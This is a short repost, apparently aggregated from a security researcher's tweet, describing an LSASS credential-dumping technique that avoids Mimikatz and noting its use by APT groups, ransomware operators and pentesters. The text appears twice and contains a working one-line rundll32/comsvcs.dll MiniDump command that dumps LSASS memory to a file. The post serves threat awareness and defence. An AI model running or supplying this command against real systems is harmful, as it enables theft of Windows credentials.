#CredentialDumping without Mimikatz Used to see this used years ago by APT groups, now seeing ransomware, pentesters and other TAs use this non stop 😭 rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\.dmp full;Wait-Process -Id (Get-Process rundll32).id https://t.co/PH3SvDF7kZ

#CredentialDumping without Mimikatz

Used to see this used years ago by APT groups, now seeing ransomware, pentesters and other TAs use this non stop 😭

rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\<NAME>.dmp full;Wait-Process -Id (Get-Process rundll32).id https://t.co/PH3SvDF7kZ
from inversecos
twit https://twitter.com/inversecos/status/1450331995112804358

Design a site like this with WordPress.com

Stack IT News